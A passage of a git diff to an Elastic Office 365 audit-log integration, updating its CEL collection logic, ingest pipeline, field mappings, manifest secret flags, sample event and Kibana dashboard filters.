calc_end_time : now)) ) @@ -123,42 +127,79 @@ program: | has(list_contents_resp_body[0].contentUri) && list_contents_resp_body[0].contentUri != "" && has(list_contents_resp_body[0].contentCreated) && list_contents_resp_body[0].contentCreated != "" ) ? - // contents exist to consume - list_contents_resp_body.map(l1, - request("GET", l1.contentUri).do_request().as(content_resp, - bytes(content_resp.Body).decode_json() - ).map(content_resp_body, - content_resp_body.with({"copy": {"o365audit": content_resp_body}}) - ).map(content_resp_body_with_copy, - content_resp_body_with_copy.copy) - ).flatten().drop_empty().as(contents, { - "events_per_content_type": contents, - "content_type": content_type, - "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max(), - "next_page": ( - (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? - list_contents_resp.Header.NextPageUri[0] - : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? - list_contents_resp.Header.Nextpageuri[0] - : - "" - ), - // keep fetching more if (nextpageuri exists) or (max time returned date != today's date) - "want_more_content": ( - ( - has(list_contents_resp.Header) && ( - (has(list_contents_resp.Header.NextPageUri) && (list_contents_resp.Header.NextPageUri.size() > 0)) || - (has(list_contents_resp.Header.Nextpageuri) && (list_contents_resp.Header.Nextpageuri.size() > 0)) - ) - ) || - ( - {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().split('T')[0] != now.format("2006-01-02") - ) - ) - }) + // contents exist to consume + list_contents_resp_body.map(l1, + (has(l1.contentExpiration) && (l1.contentExpiration.parse_time(time_layout.RFC3339) >= now)) ? + ( + request("GET", l1.contentUri).do_request().as(content_resp, + (has(content_resp.StatusCode) && content_resp.StatusCode == 200) ? + ( + bytes(content_resp.Body).decode_json() + .map(content_resp_body, + content_resp_body.with({"copy": {"o365audit": content_resp_body}})) + .map(content_resp_body_with_copy, + content_resp_body_with_copy.copy) + .flatten().drop_empty().as(contents, { + "events_per_content_type": contents, + "content_type": content_type, + // if 'contentCreated' is older than 167h55m, change it to 167h55m. + "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().as(temp_max, temp_max.parse_time(time_layout.RFC3339) > (now - duration("167h55m")) ? temp_max : (now - duration("167h55m")).format(time_layout.RFC3339)), + "next_page": ( + (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? + list_contents_resp.Header.NextPageUri[0] + : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? + list_contents_resp.Header.Nextpageuri[0] + : + "" + ), + // keep fetching more if (nextpageuri exists) or (max time returned date != today's date) + "want_more_content": ( + ( + has(list_contents_resp.Header) && ( + (has(list_contents_resp.Header.NextPageUri) && (list_contents_resp.Header.NextPageUri.size() > 0)) || + (has(list_contents_resp.Header.Nextpageuri) && (list_contents_resp.Header.Nextpageuri.size() > 0)) + ) + ) || + ( + {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().split('T')[0] != now.format("2006-01-02") + ) + ) + }) + ) + : + { + "events_per_content_type": [], + "content_type": content_type, + "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().as(temp_max, temp_max.parse_time(time_layout.RFC3339) > (now - duration("167h55m")) ? temp_max : (now - duration("167h55m")).format(time_layout.RFC3339)), + "next_page": ( + (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? + list_contents_resp.Header.NextPageUri[0] + : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? + list_contents_resp.Header.Nextpageuri[0] + : + "" + ) + } + ) + ) + : + { + "events_per_content_type": [], + "content_type": content_type, + "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().as(temp_max, temp_max.parse_time(time_layout.RFC3339) > (now - duration("167h55m")) ? temp_max : (now - duration("167h55m")).format(time_layout.RFC3339)), + "next_page": ( + (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? + list_contents_resp.Header.NextPageUri[0] + : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? + list_contents_resp.Header.Nextpageuri[0] + : + "" + ) + } + ) : // contents does not exist, or is empty array - list_contents_resp.Request.URL.parse_url().RawQuery.parse_query().as(reqQuery, { + list_contents_resp.Request.URL.parse_url().RawQuery.parse_query().as(reqQuery, [{ "events_per_content_type": size(list_contents_resp_body) == 0 ? [] : [list_contents_resp_body], "content_type": content_type, "content_created_at": ( @@ -180,12 +221,12 @@ program: | has(list_contents_resp.StatusCode) && list_contents_resp.StatusCode == 200 && (reqQuery.endTime[0].split('T')[0] != now.format("2006-01-02")) ) - }) + }]) ) ) : // When start-subscription API produces error, such as Authentication error. - { + [{ "events_per_content_type": [], "content_type": content_type, "content_created_at": @@ -196,21 +237,17 @@ program: | , "next_page": "", "want_more_content": false - } + }] ) ) ).flatten().drop_empty().as(events_list, { - "base": { - "list_contents_url": "{{url}}/api/v1.0/{{azure_tenant_id}}/activity/feed/subscriptions/content?contentType=", - "list_contents_start_time": "{{initial_interval}}" - }, + "base": state.base, "events": events_list.collate("events_per_content_type"), "want_more": events_list.collate("want_more_content").filter(e, e == true).size() > 0, "cursor": { "content_types_state_as_list": events_list.drop(["events_per_content_type"]), } }) - ) // Remove when kibana.version is 8.10.1+. {{#if tags}} tags: diff --git a/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 6e05dc63d5f..a1dce5a270b 100644 --- a/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -80,6 +80,16 @@ processors: field: o365audit.OrganizationId target_field: organization.id ignore_missing: true + - json: + tag: json-extract-stringly-OperationProperties + field: o365audit.OperationProperties + if: ctx.o365audit?.OperationProperties instanceof String + on_failure: + - remove: + field: o365audit.OperationProperties + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: o365audit.UserAgent target_field: user_agent.original @@ -1093,6 +1103,24 @@ processors: field: o365audit.UserType type: string ignore_missing: true + - foreach: + field: o365audit.Actor + if: ctx.o365audit?.Actor instanceof List + processor: + convert: + field: _ingest._value.Type + tag: convert_actor_type_to_string + type: string + ignore_missing: true + - foreach: + field: o365audit.Target + if: ctx.o365audit?.Target instanceof List + processor: + convert: + field: _ingest._value.Type + tag: convert_target_type_to_string + type: string + ignore_missing: true - convert: field: o365audit.Version type: string diff --git a/packages/o365/data_stream/audit/fields/fields.yml b/packages/o365/data_stream/audit/fields/fields.yml index 445cb4b7464..25d5994e599 100644 --- a/packages/o365/data_stream/audit/fields/fields.yml +++ b/packages/o365/data_stream/audit/fields/fields.yml @@ -1,6 +1,8 @@ - name: o365.audit type: group fields: + - name: Activity + type: keyword - name: Actor type: group fields: @@ -205,6 +207,8 @@ # not expressible here; object_type_mapping_type cannot be 'boolean'. object_type: keyword object_type_mapping_type: '*' + - name: Experience + type: keyword - name: ExtendedProperties.* type: object object_type: keyword @@ -269,10 +273,20 @@ type: keyword - name: NewValue type: keyword + - name: ObjectDisplayName + type: keyword - name: ObjectId type: keyword + - name: ObjectType + type: keyword - name: Operation type: keyword + - name: OperationId + type: keyword + - name: OperationProperties + type: object + object_type: keyword + object_type_mapping_type: '*' - name: OrganizationId type: keyword - name: OrganizationName @@ -293,6 +307,8 @@ type: keyword - name: ResultStatus type: keyword + - name: RequestId + type: keyword - name: SensitiveInfoDetectionIsIncluded type: boolean - name: SharePointMetaData.* @@ -337,6 +353,8 @@ type: keyword - name: TeamGuid type: keyword + - name: Timestamp + type: keyword - name: UniqueSharingId type: keyword - name: UserAgent @@ -353,5 +371,9 @@ type: keyword - name: Workload type: keyword + - name: WorkspaceId + type: keyword + - name: WorkspaceName + type: keyword - name: YammerNetworkId type: keyword diff --git a/packages/o365/data_stream/audit/manifest.yml b/packages/o365/data_stream/audit/manifest.yml index 69d40cd3376..d2cb9e2795a 100644 --- a/packages/o365/data_stream/audit/manifest.yml +++ b/packages/o365/data_stream/audit/manifest.yml @@ -39,6 +39,7 @@ streams: description: Client secret used for Oauth2 authentication show_user: true required: true + secret: true - name: token_url type: text title: Oauth2 Token URL @@ -46,6 +47,7 @@ streams: show_user: true required: false default: https://login.microsoftonline.com + secret: false - name: token_scopes type: text title: Token Scopes @@ -55,6 +57,7 @@ streams: description: Scopes for OAuth2 token. required: true show_user: false + secret: false - name: content_types type: text title: Content Type @@ -207,6 +210,7 @@ streams: multi: false required: false show_user: true + secret: true - name: certificate type: text title: Path to certificate file @@ -220,11 +224,12 @@ streams: required: false show_user: true - name: key_passphrase - type: text + type: password title: Private key passphrase multi: false required: false show_user: true + secret: true - name: tenants type: text multi: true diff --git a/packages/o365/data_stream/audit/sample_event.json b/packages/o365/data_stream/audit/sample_event.json index 642d024498b..7df99553dc5 100644 --- a/packages/o365/data_stream/audit/sample_event.json +++ b/packages/o365/data_stream/audit/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-02-07T16:43:53.000Z", "agent": { - "ephemeral_id": "91cd5dfa-317b-4703-978a-b833a6f2b714", - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "ephemeral_id": "50dde7f7-f3a3-4597-9ce3-fd6c21fbe6df", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "client": { "address": "213.97.47.133", @@ -20,9 +20,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "PageViewed", @@ -33,9 +33,9 @@ "code": "SharePoint", "dataset": "o365.audit", "id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", - "ingested": "2023-11-06T19:08:33Z", + "ingested": "2024-04-01T12:10:04Z", "kind": "event", - "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, ItemType=Page, UserKey=i:0h.f|membership|1003200096971f55@live.com, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, UserId=asr@testsiem.onmicrosoft.com, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, UserType=0, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875}", + "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, UserKey=i:0h.f|membership|1003200096971f55@live.com, ItemType=Page, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, UserId=asr@testsiem.onmicrosoft.com, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875, UserType=0}", "outcome": "success", "provider": "OneDrive", "type": [ @@ -108,4 +108,4 @@ }, "version": "72.0." } -} +} \ No newline at end of file diff --git a/packages/o365/docs/README.md b/packages/o365/docs/README.md index 99225910c4b..af1bc05c8c8 100644 --- a/packages/o365/docs/README.md +++ b/packages/o365/docs/README.md @@ -63,11 +63,11 @@ An example event for `audit` looks as following: { "@timestamp": "2020-02-07T16:43:53.000Z", "agent": { - "ephemeral_id": "91cd5dfa-317b-4703-978a-b833a6f2b714", - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "ephemeral_id": "50dde7f7-f3a3-4597-9ce3-fd6c21fbe6df", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "client": { "address": "213.97.47.133", @@ -82,9 +82,9 @@ An example event for `audit` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "PageViewed", @@ -95,9 +95,9 @@ An example event for `audit` looks as following: "code": "SharePoint", "dataset": "o365.audit", "id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", - "ingested": "2023-11-06T19:08:33Z", + "ingested": "2024-04-01T12:10:04Z", "kind": "event", - "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, ItemType=Page, UserKey=i:0h.f|membership|1003200096971f55@live.com, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, UserId=asr@testsiem.onmicrosoft.com, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, UserType=0, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875}", + "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, UserKey=i:0h.f|membership|1003200096971f55@live.com, ItemType=Page, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, UserId=asr@testsiem.onmicrosoft.com, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875, UserType=0}", "outcome": "success", "provider": "OneDrive", "type": [ @@ -171,7 +171,6 @@ An example event for `audit` looks as following: "version": "72.0." } } - ``` **Exported fields** @@ -246,6 +245,7 @@ An example event for `audit` looks as following: | log.offset | Offset of the entry in the log file. | long | | message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | | network.type | In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc The field value must be normalized to lowercase for querying. | keyword | +| o365.audit.Activity | | keyword | | o365.audit.Actor.ID | | keyword | | o365.audit.Actor.Type | | keyword | | o365.audit.ActorContextId | | keyword | @@ -339,6 +339,7 @@ An example event for `audit` looks as following: | o365.audit.EventSource | | keyword | | o365.audit.ExceptionInfo.\* | | object | | o365.audit.ExchangeMetaData.\* | | object | +| o365.audit.Experience | | keyword | | o365.audit.ExtendedProperties.\* | | object | | o365.audit.ExternalAccess | | boolean | | o365.audit.FileSizeBytes | | long | @@ -367,8 +368,12 @@ An example event for `audit` looks as following: | o365.audit.ModifiedProperties.\*.\* | | object | | o365.audit.Name | | keyword | | o365.audit.NewValue | | keyword | +| o365.audit.ObjectDisplayName | | keyword | | o365.audit.ObjectId | | keyword | +| o365.audit.ObjectType | | keyword | | o365.audit.Operation | | keyword | +| o365.audit.OperationId | | keyword | +| o365.audit.OperationProperties | | object | | o365.audit.OrganizationId | | keyword | | o365.audit.OrganizationName | | keyword | | o365.audit.OriginatingServer | | keyword | @@ -377,6 +382,7 @@ An example event for `audit` looks as following: | o365.audit.PolicyDetails | | flattened | | o365.audit.PolicyId | | keyword | | o365.audit.RecordType | | keyword | +| o365.audit.RequestId | | keyword | | o365.audit.ResultStatus | | keyword | | o365.audit.SensitiveInfoDetectionIsIncluded | | boolean | | o365.audit.SessionId | | keyword | @@ -397,6 +403,7 @@ An example event for `audit` looks as following: | o365.audit.TargetUserOrGroupType | | keyword | | o365.audit.TeamGuid | | keyword | | o365.audit.TeamName | | keyword | +| o365.audit.Timestamp | | keyword | | o365.audit.UniqueSharingId | | keyword | | o365.audit.UserAgent | | keyword | | o365.audit.UserId | | keyword | @@ -405,6 +412,8 @@ An example event for `audit` looks as following: | o365.audit.Version | | keyword | | o365.audit.WebId | | keyword | | o365.audit.Workload | | keyword | +| o365.audit.WorkspaceId | | keyword | +| o365.audit.WorkspaceName | | keyword | | o365.audit.YammerNetworkId | | keyword | | organization.id | Unique identifier for the organization. | keyword | | organization.name | Organization name. | keyword | diff --git a/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json b/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json index 44cda5782bd..982b03ac80b 100644 --- a/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json +++ b/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json @@ -21,11 +21,17 @@ { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-051e93f9-a0af-4048-8b2b-c0f80afef037", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1f7c266f-4644-40a7-8d95-093ce57f0bde", + "type": "index-pattern" } ], "state": { @@ -59,11 +65,34 @@ "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "1f7c266f-4644-40a7-8d95-093ce57f0bde", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset:\"o365.audit\" " + "query": "" }, "visualization": { "layerId": "051e93f9-a0af-4048-8b2b-c0f80afef037", @@ -88,16 +117,22 @@ "panelIndex": "b6942e2a-81dc-40e4-a932-8b7a864b28bc", "title": "Audit Event Count [Logs o365]", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-5f7c5274-a250-4841-8da4-02409d1dec5a", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e660b65c-3095-4031-92b8-6e7d33b77934", + "type": "index-pattern" } ], "state": { @@ -173,11 +208,34 @@ "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e660b65c-3095-4031-92b8-6e7d33b77934", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset:\"o365.audit\" " + "query": "" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -262,16 +320,22 @@ }, "panelIndex": "9673e6df-4b1e-4771-b1c6-c41c9bfc7272", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-4f66319b-8f8c-4e74-b285-e81462d8508c", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "86705eef-7a2e-45c2-8ec0-b0cfd99357b0", + "type": "index-pattern" } ], "state": { @@ -332,11 +396,34 @@ "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "86705eef-7a2e-45c2-8ec0-b0cfd99357b0", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset:\"o365.audit\" " + "query": "" }, "visualization": { "layers": [ @@ -387,11 +474,12 @@ "panelIndex": "70ab7239-c65c-41da-8242-da61750745d7", "title": "Audit Event Type [Logs o365]", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -400,7 +488,12 @@ }, { "id": "logs-*", - "name": "2c47b554-eafa-4209-ad42-afc5b207be0b", + "name": "020d0487-163c-45ed-95ca-5c643e903632", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e48f699a-8e4e-4e8e-957c-aceec5f283a9", "type": "index-pattern" } ], @@ -498,7 +591,7 @@ "alias": null, "disabled": false, "field": "event.category", - "index": "2c47b554-eafa-4209-ad42-afc5b207be0b", + "index": "020d0487-163c-45ed-95ca-5c643e903632", "key": "event.category", "negate": false, "params": { @@ -511,6 +604,28 @@ "event.category": "authentication" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e48f699a-8e4e-4e8e-957c-aceec5f283a9", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } } ], "internalReferences": [], @@ -562,16 +677,16 @@ "panelIndex": "9ae12e73-92f2-43a6-b847-2a7b1939709c", "title": "Top users by authentication outcome", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { "description": "", "layerListJSON": "[{\"alpha\":1,\"id\":\"0b910b6c-77c8-4223-892a-1ebf69b0ccb4\",\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"type\":\"EMS_TMS\",\"lightModeDefault\":\"road_map\"},\"style\":{},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"acc53b7b-3411-406b-9371-6fa62b6b9365\",\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyGlobalQuery\":true,\"geoField\":\"source.geo.location\",\"id\":\"3ba31ffc-7051-44bf-96a0-a684020cd2a3\",\"requestType\":\"point\",\"resolution\":\"FINE\",\"type\":\"ES_GEO_GRID\",\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"style\":{\"isTimeAware\":true,\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Yellow to Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"type\":\"ORDINAL\",\"useCustomColorRamp\":false},\"type\":\"DYNAMIC\"},\"icon\":{\"options\":{\"value\":\"airfield\"},\"type\":\"STATIC\"},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"maxSize\":32,\"minSize\":8},\"type\":\"DYNAMIC\"},\"labelBorderColor\":{\"options\":{\"color\":\"#FFFFFF\"},\"type\":\"STATIC\"},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelColor\":{\"options\":{\"color\":\"#000000\"},\"type\":\"STATIC\"},\"labelSize\":{\"options\":{\"size\":14},\"type\":\"STATIC\"},\"labelText\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"}},\"type\":\"DYNAMIC\"},\"lineColor\":{\"options\":{\"color\":\"#FFF\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":0},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]", - "mapStateJSON": "{\"center\":{\"lat\":30.87292,\"lon\":16.67387},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:\\\"o365.audit\\\" \"},\"refreshConfig\":{\"interval\":0,\"isPaused\":false},\"timeFilters\":{\"from\":\"2020-02-05T03:25:59.045Z\",\"to\":\"2020-02-29T10:59:01.067Z\"},\"zoom\":2.88,\"settings\":{\"autoFitToDataBounds\":false}}", + "mapStateJSON": "{\"adHocDataViews\":[],\"zoom\":1.88,\"center\":{\"lon\":-48.94209,\"lat\":42.68781},\"timeFilters\":{\"from\":\"now-30m\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":false,\"interval\":0},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"o365.audit\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"o365.audit\"}},\"$state\":{\"store\":\"appState\"}}],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"customIcons\":[],\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"keydownScrollZoom\":false,\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", "title": "Client Geo Map [Logs o365 audit]", - "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}" + "uiStateJSON": "{\"isLayerTOCOpen\":false,\"openTOCDetails\":[]}" }, "enhancements": {}, "hiddenLayers": [], @@ -593,7 +708,7 @@ "panelIndex": "15fe975b-6b8b-4445-872d-e06c041e2c31", "title": "Client geolocation map", "type": "map", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { @@ -610,35 +725,48 @@ "panelRefName": "panel_481f1778-caad-4971-b598-bb61c94bf998", "title": "Data Loss Prevention alerts", "type": "search", - "version": "8.7.1" + "version": "8.10.1" } ], "timeRestore": false, "title": "[Logs o365] Audit Dashboard", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-11T02:43:17.837Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-25T14:33:11.892Z", "id": "o365-712e2c00-685d-11ea-8d6a-292ef5d68366", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", "name": "b6942e2a-81dc-40e4-a932-8b7a864b28bc:indexpattern-datasource-layer-051e93f9-a0af-4048-8b2b-c0f80afef037", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "b6942e2a-81dc-40e4-a932-8b7a864b28bc:1f7c266f-4644-40a7-8d95-093ce57f0bde", + "type": "index-pattern" + }, { "id": "logs-*", "name": "9673e6df-4b1e-4771-b1c6-c41c9bfc7272:indexpattern-datasource-layer-5f7c5274-a250-4841-8da4-02409d1dec5a", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "9673e6df-4b1e-4771-b1c6-c41c9bfc7272:e660b65c-3095-4031-92b8-6e7d33b77934", + "type": "index-pattern" + }, { "id": "logs-*", "name": "70ab7239-c65c-41da-8242-da61750745d7:indexpattern-datasource-layer-4f66319b-8f8c-4e74-b285-e81462d8508c", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "70ab7239-c65c-41da-8242-da61750745d7:86705eef-7a2e-45c2-8ec0-b0cfd99357b0", + "type": "index-pattern" + }, { "id": "logs-*", "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:indexpattern-datasource-layer-0510317c-e0fb-49b5-b22c-80c0865aa5ff", @@ -646,7 +774,12 @@ }, { "id": "logs-*", - "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:2c47b554-eafa-4209-ad42-afc5b207be0b", + "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:020d0487-163c-45ed-95ca-5c643e903632", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:e48f699a-8e4e-4e8e-957c-aceec5f283a9", "type": "index-pattern" }, { @@ -658,7 +791,13 